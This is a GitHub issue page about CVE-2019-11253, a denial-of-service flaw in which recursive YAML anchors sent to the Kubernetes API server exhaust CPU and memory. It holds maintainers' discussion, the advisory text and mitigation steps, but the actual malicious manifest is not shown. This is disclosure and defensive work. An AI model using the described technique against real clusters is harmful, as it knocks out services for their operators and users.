-
Notifications
You must be signed in to change notification settings - Fork 40.2k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253
Comments
/sig cli |
To update based on ideas from @liggitt and @bgeesaman , it's also possible to use this issue to cause a denial of service to the Steps to reproduce.
|
Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references. Any real world usages of users sending yaml to the api server? Can we go JSON/proto only? |
Nice find! |
I don't think we can simply drop a supported format. Disabling alias/anchor expansion or bounding allocations seem more reasonable. I have a fix in progress that does the latter. |
Sounds like something that should be treated as a security issue (DoS) and have a CVE associated to it. That would help users to understand whether or not they are vulnerable to it. |
I did a pr on go-yaml 1 year ago to mitigate this issue on some of our server side components: go-yaml/yaml#375. Hope it helps! |
/assign @jktomer |
@roycaihw: GitHub didn't allow me to assign the following users: jktomer. Note that only kubernetes members, repo collaborators and people who have commented on this issue/PR can be assigned. Additionally, issues/PRs can only have 10 assignees at the same time. In response to this:
Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository. |
I'm not disagreeing, but: We could drop yaml, and communicate that through Accept headers in an unambiguous way. On the other hand, claiming to accept "yaml" but then dropping support for some features of yaml seems harder for a client to respond to automatically :/ Also note we have patch variants like (I completely agree that almost no "legitimate" client is sending yaml with anchors, except maybe in a hypothetical CRD that is human authored and contains lots of internal duplication (argo pipeline??). I personally have no problems with nuking yaml anchor support, just as we also don't support !!foo, etc) |
yeah, it would be a fundamental patch to the yaml library, effective process-wide |
It could be worth noting that following discussions with the maintainer and golang security team, a patch has been made for go-yaml which looks to address this kind of attack go-yaml/yaml@bb4e33b |
To mitigate against malicious YAML (as described here: kubernetes/kubernetes#83253) we used a patched version of yaml.v2. There is now a fix upstream so we can leverage that. Signed-off-by: Christopher Crone <christopher.crone@docker.com>
To mitigate against malicious YAML (as described here: kubernetes/kubernetes#83253) we used a patched version of yaml.v2. There is now a fix upstream so we can leverage that. Signed-off-by: Christopher Crone <christopher.crone@docker.com>
/label official-cve-feed (Related to kubernetes/sig-security#1) |
Make sure we're not vulnerable to CVE-2019-11253. See kubernetes/kubernetes#83253
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.
Affected versions:
All four patch releases are now available.
Fixed in master by #83261
Mitigation:
Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability.
To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as
rbac.yaml
, and run:Note: this removes the ability for unauthenticated users to use
kubectl auth can-i
If you are running a version prior to v1.14.0:
=============
Original description follows:
Introduction
Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here
What happened:
When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.
Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.
What you expected to happen:
Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl.
One note is that the original poster on Stackoverflow indicated that the resource consumption was in
kube-apiserver
but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side.How to reproduce it (as minimally and precisely as possible):
Get the manifest above and apply to a cluster as normal with
kubectl create -f <manifest>
. Usetop
or another CPU monitor to observe the quantity of CPU time used.Anything else we need to know?:
Environment:
kubectl version
):test 1 (linux AMD64 client, Kubeadm cluster running in kind)
test 2 (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation)
The text was updated successfully, but these errors were encountered: